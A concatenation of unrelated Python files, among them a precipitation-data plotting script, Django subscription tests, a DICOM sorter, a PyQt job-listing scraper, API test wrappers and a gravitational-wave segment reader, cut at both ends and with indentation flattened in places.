valid_count += 1
out_data = np.mean(site_data[iter_date])
else:
out_data = -999
miss_count += 1
if out_data != -999 :
                plot_dict[iter_date] = float(out_data) # append data to plot dictionary
cardfile.write('{:12s}{:2d}{:02d}{:4d}{:9.2f}'.format(site_label,int(iter_date.month),int(str(iter_date.year)[-2:]),month_count,float(out_data)))
cardfile.write('\n')
previous_month = int(iter_date.month)
iter_date = iter_date + dt.timedelta(hours=step_time)
cardfile.close()
if ext == '.ptp' and station_plot == 'on':
### save hourly precip data to pandas dataframe, reample, and plot
print 'Creating plot of daily and monthly station data... '
df = pd.DataFrame(plot_dict.items(), columns=['Date_Time', 'ptp'])
#df.reset_index(level=[0, 1], inplace=True)
resample_df_daily = df.set_index('Date_Time')['ptp'].resample('D', how='sum')# resample to daily
resample_df_monthly = df.set_index('Date_Time')['ptp'].resample('M', how='sum')# resample to monthly
plot_dates_daily = resample_df_daily.index.to_pydatetime(); plot_data_daily = resample_df_daily.values.tolist()
plot_dates_monthly = resample_df_monthly.index.to_pydatetime(); plot_data_monthly = resample_df_monthly.values.tolist()
fig = plt.subplots(figsize=(16,10))
ax1 = plt.subplot(211)
ax1.bar(plot_dates_daily, plot_data_daily, color ='k') # plot data
ax1.set_ylabel('Daily Precip (in)')#; ax1.set_xlabel('Date')
ax1.xaxis.set_major_locator(matplotlib.dates.YearLocator())
plt.xticks(rotation='vertical')
ax1.grid(True)
plt.title(station_summary[site_id][0] + ', MX - CONAGUA (' + site_id + ')', fontsize=16)
ax2 = plt.subplot(212, sharex=ax1)
ax2.bar(plot_dates_monthly, plot_data_monthly, color ='k') # plot data
ax2.set_ylabel('Monthly Precip (in)'); ax2.set_xlabel('Date')
plt.xticks(rotation='vertical')
ax2.xaxis.set_major_locator(matplotlib.dates.YearLocator())
mean_annual_ppt = 'Mean Annual Precip: ' + "%.2f" % (np.nanmean(plot_data_monthly)*12) + ' in'
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
ax2.text(0.75, 0.95, mean_annual_ppt, fontsize=13, transform=ax2.transAxes,
verticalalignment='top', bbox=props)
#ax.xaxis.set_minor_locator(matplotlib.dates.MonthLocator())
#ax.xaxis.set_minor_formatter(matplotlib.dates.DateFormatter('%m'))
#ax.tick_params(axis='x',labelsize=8, which = 'minor')
ax2.grid(True)
plt.savefig(workingdir + os.sep + 'CONAGUA' + os.sep + 'station_data_plots_' + timestep + os.sep + site_label, bbox_inches='tight')
plt.close()
### write to summary csv files and taplot files ###
print 'Writing summary and taplot files...'
if ext == '.tpt' or ext == '.ptp':
summary_file.write(station_summary[site_id][0]+','+str(site_id)+','+station_summary[site_id][1]+','+station_summary[site_id][2]+','+station_summary[site_id][3]+
','+str(miss_count)+','+str(valid_count)+','+str(round((valid_count/year_factor),2))+','+str((float(valid_count)/(miss_count+valid_count))*100)+','+str(min_date.year) +',' + str(max_date.year) + '\n')
if variable == 'ptpx':
bad_ptpx_summary.close()
summary_file.close()
print 'Completed!'
print 'Running time: ' + str(datetime.now() - startTime)
|
# Copyright (C) 2019 Verizon. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
from rest_framework.test import APIClient
from django.test import TestCase
from catalog.pub.database.models import VnfPkgSubscriptionModel
from .const import vnf_subscription_data
class TestNfPackageSubscription(TestCase):
def setUp(self):
self.client = APIClient()
VnfPkgSubscriptionModel.objects.filter().delete()
self.vnf_subscription_data = vnf_subscription_data
def tearDown(self):
pass
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_create_vnf_subscription(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
response = self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(201, response.status_code)
self.assertEqual(
self.vnf_subscription_data["callbackUri"],
response.data["callbackUri"]
)
self.assertEqual(temp_uuid, response.data["id"])
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_duplicate_subscriptions(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
temp1_uuid = "00342b18-a5c7-11e8-998c-bf1755941f12"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.side_effect = [temp_uuid, temp1_uuid]
response = self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(201, response.status_code)
self.assertEqual(
self.vnf_subscription_data["callbackUri"],
response.data["callbackUri"]
)
self.assertEqual(temp_uuid, response.data["id"])
temp_uuid = "00442b18-a5c7-11e8-998c-bf1755941f12"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
response = self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(303, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscriptions(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions?usageState=IN_USE",
format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(1, len(response.data))
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscriptions_with_invalid_params(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions?dummy=dummy",
format='json'
)
self.assertEqual(400, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscription_with_id(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % temp_uuid,
format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(temp_uuid, response.data["id"])
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscription_with_id_not_exists(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
dummy_uuid = str(uuid.uuid4())
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid,
format='json'
)
self.assertEqual(404, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_delete_subscription_with_id(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
dummy_uuid = str(uuid.uuid4())
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid,
format='json'
)
response = self.client.delete("/api/vnfpkgm/v1/subscriptions/%s" % temp_uuid)
self.assertEqual(204, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_delete_subscription_with_id_not_exists(self, mock_uuid4, mock_requests):
dummy_uuid = str(uuid.uuid4())
response = self.client.delete("/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid)
self.assertEqual(404, response.status_code)
|
from avatar import *
class Bike(Avatar):
def __init__(self):
self.name = "bike"
def action(self):
pass
|
import pandas as pd
import numpy as np
"""
Function which convert the label of subconcepts into core concepts labels
"""
def convert_sub_concepts_to_core(ontology, abstract_concepts_file):
# open files
concepts = pd.read_csv(abstract_concepts_file, sep=",", header=0).values
    # create dictionary of core concepts
core_concepts = set(concepts[:,1])
core_concepts = {k:i for i,k in enumerate(core_concepts)}
    # create dictionary mapping each subconcept to its core concept
sub_to_core = concepts[:,1]
for i in range(ontology.shape[0]):
ontology[i,1] = core_concepts[sub_to_core[ontology[i,1]]]
return ontology, core_concepts
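# --- Illustrative sketch (not part of the original module) ---
# A hypothetical call showing the expected inputs: the CSV is assumed to map
# subconcept rows (column 0) to core concept names (column 1), and the second
# column of `ontology` is assumed to hold subconcept row indices. The inline CSV
# and demo array below are made up purely for illustration.
if __name__ == "__main__":
    import io
    demo_csv = io.StringIO("subconcept,core\ndog,animal\ncat,animal\noak,plant\n")
    demo_ontology = np.array([[10, 0], [11, 2], [12, 1]])
    relabelled, core = convert_sub_concepts_to_core(demo_ontology, demo_csv)
    print(relabelled)  # second column now holds core concept indices
    print(core)        # e.g. {'animal': 0, 'plant': 1} (order may vary)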
|
import requests
import time
from datetime import datetime
import json, io, os
def writefileheaders(filename, json_data):
    with io.open(filename, 'w', encoding='utf-8') as f:
        for bolt in range(len(json_data["bolts"])):
            f.write(unicode("boltId, emitted, executeLatency(s), processLatency(s), "))
        for spout in range(len(json_data["spouts"])):
            f.write(unicode("spoutId, completeLatency(s), "))
        f.write(unicode("tasksTotal, completeLatency(s), uptime"))
        f.write(unicode("\n"))
def dump2file(filename, json_data):
    if not os.path.isfile(filename) or os.stat(filename).st_size == 0:
        writefileheaders(filename, json_data)
    with io.open(filename, 'a', encoding='utf-8') as f:
        print json_data["topologyStats"]
        # f.write(unicode(json.dumps(json_data, ensure_ascii=False)))
        for bolt in range(len(json_data["bolts"])):
            f.write(unicode(json_data["bolts"][bolt]["boltId"])+", ")
            f.write(unicode(json_data["bolts"][bolt]["emitted"])+", ")
            f.write(unicode(json_data["bolts"][bolt]["executeLatency"])+", ")
            f.write(unicode(json_data["bolts"][bolt]["processLatency"])+", ")
        for spout in range(len(json_data["spouts"])):
            f.write(unicode(json_data["spouts"][spout]["spoutId"])+", ")
            f.write(unicode(json_data["spouts"][spout]["completeLatency"])+", ")
        f.write(unicode(json_data["tasksTotal"])+", ")
        f.write(unicode(json_data["topologyStats"][0]["completeLatency"])+", ")
        f.write(unicode(json_data["uptime"]))
        f.write(unicode("\n"))
if __name__ == '__main__':
storm_topology_url = 'http://example.com:49467/api/v1/topology/trendingHashTags-15-1476271470'
experiment_name = "YARN-Default_1Node"
experiment_outfile = "./Storm_"+experiment_name+\
"-"+str(datetime.now())+".dat"
while True:
response = requests.get(storm_topology_url)
data = response.json()
print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
dump2file(experiment_outfile, data)
time.sleep(10)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys , argparse
import glob
import numpy as np
import pydicom
from shutil import copyfile, rmtree, move
def get_arguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="",
epilog="""
Sort DICOM Files
Input: Folder
""")
parser.add_argument(
"-d", "--idir",
required=True, nargs="+",
help="Folder to be sorted",
)
parser.add_argument(
"-r", "--rmRaw",
required=False, nargs="+",
help="Remove raw folder",
)
parser.add_argument(
"-k", "--keepName",
required=False, nargs="+",
help="Keep old name",
)
parser.add_argument(
"-o", "--odir",
required=True, nargs="+",
help="Output folder - if doesnt exist it will be created",
)
parser.add_argument(
"-v", "--verbose",
action='store_true',
help="Verbose to get more information about whats going on",
)
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
else:
return args
class sortDCM(object):
"""
"""
def __init__(
self, idir, odir, rmRaw=False, keepName=False,
verbose=False, log_level="INFO"):
self.inputFolder = idir[0]
if not os.path.exists(self.inputFolder):
print('Input dir does not exit: {}'.format(self.inputFolder))
sys.exit()
if not os.path.exists(odir[0]):
os.mkdir(odir[0])
self.outputFolder = odir[0]
self.keepName = keepName
self.verbose = verbose
self.rmRaw = rmRaw
def run(self):
onlyFiles = [os.path.join(path, name) for path, subdirs, files in os.walk(self.inputFolder) for name in files]
onlyFiles.sort()
meSeq = []
for nFile in onlyFiles:
if self.verbose:
print('File: '+nFile)
iFile = nFile
ds = pydicom.dcmread(iFile, force=True) # Read File
if 'SeriesNumber' in ds and 'SeriesDescription' in ds and 'PatientName' in ds and 'InstanceNumber' in ds:
seriesFolder = os.path.join(self.outputFolder, '{:02d}'.format(ds.SeriesNumber) + '-' + str(ds.SeriesDescription.replace(' ','_').replace('/','_')))
if not os.path.exists(seriesFolder): # Create Serie Directory
os.mkdir(seriesFolder)
if self.verbose:
print('Create new series of dicoms: {}'.format(seriesFolder))
if not self.keepName: # Change Name
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
else:
newName = os.path.join(seriesFolder, nFile)
if not os.path.exists(newName):
copyfile(iFile, newName)
if self.verbose:
print('Copy file {} to {}'.format(nFile, newName))
else:
print('ERROR: {} already exists with this new name {}'.format(iFile, newName))
if 'EchoNumbers' in ds:
meSeq.append(seriesFolder)
copyfile(iFile, newName.replace('.dcm','_' + str(ds.EchoNumbers) + '.dcm'))
meSeq = list(set(meSeq))
for nSeries in meSeq:
onlyFiles = [f for f in os.listdir(nSeries) if os.path.isfile(os.path.join(nSeries, f))]
for nFile in onlyFiles:
iFile = os.path.join(nSeries, nFile)
ds = pydicom.dcmread(iFile, force=True) # Read File
if 'EchoNumbers' in ds:
seriesFolder = os.path.join(nSeries, 'echo_' + str(ds.EchoNumbers))
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
move(iFile, newName)
else:
seriesFolder = os.path.join(nSeries, 'echo_others')
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
move(iFile, newName)
else:
seriesFolder = os.path.join(self.outputFolder, 'others')
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, os.path.basename(nFile))
copyfile(iFile, newName)
else:
print('File: {} is missing some keys'.format(nFile))
# Remove input Folder
if self.rmRaw:
rmtree(self.inputFolder)
if self.verbose:
print('Remove RAW folder: {}'.format(self.inputFolder))
def main():
"""Let's go"""
args = get_arguments()
app = sortDCM(**vars(args))
return app.run()
if __name__ == '__main__':
sys.exit(main())
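# Example invocation (a sketch; the script name and paths below are placeholders,
# not taken from the original repository):
#   python sort_dicom.py -d /path/to/raw_dicoms -o /path/to/sorted -v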
|
# Generated by Django 2.2.3 on 2020-01-15 09:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("robbit", "0006_auto_20190718_1221")]
operations = [
migrations.AlterField(
model_name="tile", name="x", field=models.BigIntegerField(db_index=True)
),
migrations.AlterField(
model_name="tile", name="y", field=models.BigIntegerField(db_index=True)
),
]
|
def zebulansNightmare(arg):
return ''.join([x.capitalize() if c != 0 else x for c,x in enumerate(arg.split('_'))])
'''
Zebulan has worked hard to write all his Python code in strict compliance with PEP8
rules. In this kata, you are a mischievous hacker who has set out to sabotage all his good code.
Your job is to take PEP8 compatible function names and convert them to camelCase. For example:
zebulansNightmare('camel_case') == 'camelCase'
zebulansNightmare('zebulans_nightmare') == 'zebulansNightmare'
zebulansNightmare('get_string') == 'getString'
zebulansNightmare('convert_to_uppercase') == 'convertToUppercase'
zebulansNightmare('main') == 'main'
'''
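# A minimal sanity check of the solution above (not part of the original kata file):
if __name__ == '__main__':
    assert zebulansNightmare('camel_case') == 'camelCase'
    assert zebulansNightmare('convert_to_uppercase') == 'convertToUppercase'
    assert zebulansNightmare('main') == 'main'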
|
from PyQt5 import QtCore,QtWidgets
from PyQt5.QtWidgets import QApplication, QWidget
import sys
import requests
from lxml import etree
import re
from concurrent.futures import ThreadPoolExecutor
import threading
import csv
import os
Tlock = threading.Lock()
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(832, 522)
self.gridLayout = QtWidgets.QGridLayout(Form)
self.gridLayout.setObjectName("gridLayout")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setObjectName("textBrowser")
self.gridLayout.addWidget(self.textBrowser, 1, 0, 1, 5)
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setObjectName("pushButton_2")
self.gridLayout.addWidget(self.pushButton_2, 3, 2, 1, 1)
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setObjectName("pushButton_3")
self.gridLayout.addWidget(self.pushButton_3, 4, 2, 1, 1)
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setObjectName("pushButton")
self.gridLayout.addWidget(self.pushButton, 3, 3, 1, 1)
self.pushButton_4 = QtWidgets.QPushButton(Form)
self.pushButton_4.setObjectName("pushButton_4")
self.gridLayout.addWidget(self.pushButton_4, 4, 3, 1, 1)
self.lineEdit = QtWidgets.QLineEdit(Form)
self.lineEdit.setObjectName("lineEdit")
self.gridLayout.addWidget(self.lineEdit, 3, 0, 1, 1)
self.pushButton_5 = QtWidgets.QPushButton(Form)
self.pushButton_5.setObjectName("pushButton_5")
self.gridLayout.addWidget(self.pushButton_5, 4, 0, 1, 1)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "luvm的招聘信息获取软件_彭迪"))
self.pushButton_2.setText(_translate("Form", "武汉理工就业网招聘会"))
self.pushButton_3.setText(_translate("Form", "华科就业网招聘信息"))
self.pushButton.setText(_translate("Form", "华科就业网招聘会"))
self.pushButton_4.setText(_translate("Form", "武汉理工就业网招聘信息"))
self.pushButton_5.setText(_translate("Form", "关键字搜索"))
class mwindow(QWidget, Ui_Form):
def __init__(self):
super(mwindow, self).__init__()
self.setupUi(self)
self.li = ['./whut_meeting.csv','./hust_meeting.csv','./whut_job.csv','./hust_job.csv']
for i in self.li:
if os.path.exists(i):
os.remove(i)
def csv_saver(self,name,cont):
with open(name, 'at', newline='', encoding='utf-8') as f:
writer = csv.writer(f)
writer.writerow(cont)
def whut_meeting(self):
self.textBrowser.setText('武汉理工就业网未来几天招聘会信息:')
self.textBrowser.append("-" * 60)
if os.path.exists('./whut_meeting.csv'):
with open('./whut_meeting.csv','rt',encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1,11):
executor.submit(self.whut_meeting_more, i)
executor.shutdown(wait=True)
def whut_meeting_more(self,i):
Tlock.acquire()
whut_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
res = requests.get('http://scc.whut.edu.cn/meetList.shtml?date=&searchForm=&pageNow={}'.format(i), headers=whut_headers)
html = res.content
parseHtml = etree.HTML(html)
conts = parseHtml.xpath('/html/body/div[3]/div[2]/ul/li')
for cont in conts:
name = cont.xpath('./a/text()')[0].strip()
place = cont.xpath('./span[2]/text()')[0].strip()
time_ = cont.xpath('./span[1]/text()')[0].strip()
url = 'http://scc.whut.edu.cn/' + cont.xpath('./a/@href')[0].strip()
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./whut_meeting.csv', [name,place,time_,url])
self.textBrowser.append('-' * 30)
self.textBrowser.append("-" * 60)
Tlock.release()
def hust_meeting(self):
self.textBrowser.setText('华科就业网未来几天招聘会信息:')
self.textBrowser.append("-" * 60)
if os.path.exists('./hust_meeting.csv'):
with open('./hust_meeting.csv','r',encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1,11):
executor.submit(self.hust_meeting_more, i)
executor.shutdown(wait=True)
def hust_meeting_more(self,i):
Tlock.acquire()
hust_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
res = requests.get('http://job.hust.edu.cn/searchJob_{}.jspx?type=0&fbsj=0'.format(i), headers=hust_headers)
html = res.text
names = re.findall('title="(.*?)"', html)
urls = re.findall('href="(.*?) title="', html)
time_s = re.findall('<span>(\d*-\d*-\d* \d*:\d* )</span>', html)
places = re.findall(r'<span>([\u4e00-\u9fa5]+[A-Z]*[\u4e00-\u9fa5]*[0-9]*[\u4e00-\u9fa5]*)</span>', html)[:-2]
for n, name in enumerate(names):
time_ = time_s[n]
place = places[n]
url = 'http://job.hust.edu.cn' + urls[n][:-1]
self.textBrowser.append(name + ' ' + time_ + ' ' + place)
self.textBrowser.append(url)
self.textBrowser.append('-' * 30)
self.csv_saver('./hust_meeting.csv', [name, place, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def whut_job(self):
self.textBrowser.setText('武汉理工就业网最近几天发布的招聘信息:')
self.textBrowser.append('-'*60)
if os.path.exists('./whut_job.csv'):
with open('./whut_job.csv','r',encoding='utf-8') as f:
for i in f.readlines():
name, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1, 11):
executor.submit(self.whut_job_more, i)
executor.shutdown(wait=True)
def whut_job_more(self,i):
Tlock.acquire()
whut_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
url = 'http://scc.whut.edu.cn/infoList.shtml?tid=1001&searchForm=&pageNow={}'.format(i)
res = requests.get(url, headers=whut_headers)
html = res.content
parseHtml = etree.HTML(html)
conts = parseHtml.xpath('/html/body/div[3]/div[2]/ul/li')
for cont in conts:
name = cont.xpath('./a/text()')[0].strip()
time_ = cont.xpath('./span/text()')[0].strip()
url = 'http://scc.whut.edu.cn/' + cont.xpath('./a/@href')[0].strip()
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./whut_job.csv', [name, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def hust_job(self):
self.textBrowser.setText('华科就业网最近几天发布的招聘信息:')
self.textBrowser.append('-'*60)
if os.path.exists('./hust_job.csv'):
with open('./hust_job.csv','r',encoding='utf-8') as f:
for i in f.readlines():
try:
name,time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + time_ )
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
except:
pass
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1, 11):
executor.submit(self.hust_job_more, i)
executor.shutdown(wait=True)
def hust_job_more(self,i):
Tlock.acquire()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"}
url1 = 'http://job.hust.edu.cn/searchJob_{}.jspx?type=2&fbsj='.format(i)
        html = requests.get(url1, headers=headers).text
names = re.findall('title="(.*?)"', html)
times = re.findall('<td width="120" valign="top">\[(.*?)\]</td>', html)
urls = re.findall('<a href="(.*?)" title=', html)
for n, name in enumerate(names):
time_ = times[n]
url = 'http://job.hust.edu.cn' + urls[n]
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./hust_job.csv', [name, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def search(self):
keyword = self.lineEdit.text()
self.textBrowser.setText('针对关键字为“{}”搜索:'.format(keyword))
self.textBrowser.append('-'*60)
for file in self.li:
if os.path.exists(file) :
if 'meeting' in file:
with open(file, 'r', encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
if keyword in name:
self.textBrowser.append(name + ' '+place+' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
with open(file, 'r', encoding='utf-8') as f:
for j in f.readlines():
name, time_, url = j.strip().split(',')
if keyword in name:
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
self.lineEdit.clear()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = mwindow()
w.pushButton.clicked.connect(w.hust_meeting)
w.pushButton_3.clicked.connect(w.hust_job)
w.pushButton_2.clicked.connect(w.whut_meeting)
w.pushButton_4.clicked.connect(w.whut_job)
w.pushButton_5.clicked.connect(w.search)
w.lineEdit.returnPressed.connect(w.search)
w.show()
sys.exit(app.exec_())
|
from common.run_method import RunMethod
import allure
@allure.step("极运营/系统设置/基础参数设置/线索来源/查询")
def dict_studentSource_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment/host to send the request to
    :return: JSON response by default; if return_json=False, the raw response
    '''
name = "极运营/系统设置/基础参数设置/线索来源/查询"
url = f"/service-crm/dict/studentSource/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
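# A hypothetical usage sketch (the body keys and header below are assumptions for
# illustration only, not taken from the real API contract):
#
#   body = {"pageNum": 1, "pageSize": 20}
#   res = dict_studentSource_query_post(body=body, header={"token": "<auth-token>"})
#   print(res)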
@allure.step("极运营/系统设置/基础参数设置/线索来源/新增")
def dict_studentSource_add_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment/host to send the request to
    :return: JSON response by default; if return_json=False, the raw response
    '''
name = "极运营/系统设置/基础参数设置/线索来源/新增"
url = f"/service-crm/dict/studentSource/add"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/系统设置/基础参数设置/线索来源/修改")
def dict_studentSource_edit_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment/host to send the request to
    :return: JSON response by default; if return_json=False, the raw response
    '''
name = "极运营/系统设置/基础参数设置/线索来源/修改"
url = f"/service-crm/dict/studentSource/edit"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/系统设置/基础参数设置/线索来源/编辑状态")
def dict_studentSource_updateStatus_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment/host to send the request to
    :return: JSON response by default; if return_json=False, the raw response
    '''
name = "极运营/系统设置/基础参数设置/线索来源/编辑状态"
url = f"/service-crm/dict/studentSource/updateStatus"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/通用/查询线索来源")
def dict_studentSource_queryNoAuth_post(params=None, body=None, header=None, return_json=True, **kwargs):
    '''
    :param: query parameters appended to the URL
    :body: request body
    :return_json: whether to return the response as JSON (default: True)
    :header: request headers
    :host: environment/host to send the request to
    :return: JSON response by default; if return_json=False, the raw response
    '''
name = "极运营/通用/查询线索来源"
url = f"/service-crm/dict/studentSource/queryNoAuth"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
import numpy as np # importing the libraries
import os
from gwpy.table import EventTable
from gwpy.segments import DataQualityDict
from trigfind import find_trigger_files
from gwpy.segments import DataQualityFlag
from gwpy.time import tconvert
import datetime
from gwpy.time import to_gps
from gwpy.time import from_gps
import pandas as pd
from gwpy.segments import Segment
gpstime = raw_input("Enter the gpstime: ")
days = raw_input("Enter the number of days: ")
scattime = []
scatseg = []
l2 = []
l1 = []
for i in range(0,int(days),1):
l1.append(int(gpstime) +i*86400)
for m in l1:
starttime = m
endtime = m + 86400
date = tconvert(starttime).date().isoformat().replace('-','') # getting date from the starttime
try:
scatpath = '/home/detchar/public_html/scattering/day/'+str(date)+'/L1-SCATTERING_SEGMENTS_15_HZ-'+str(starttime)+'-'+'86400'+'.xml.gz' # address of the scattering file in cluster.
flags = DataQualityDict.read(scatpath)
flagsd = dict(flags)
#reading the active segments in a list.
[scatseg.append(i.active) for i in flagsd.values()]
# for j in range(len(scatseg)):
# scattime.append([scatseg[j][i][1] - scatseg[j][i][0] for i in range(len(scatseg[j]))])
# for i in range(len(scattime)):
# for k in scattime[i]:
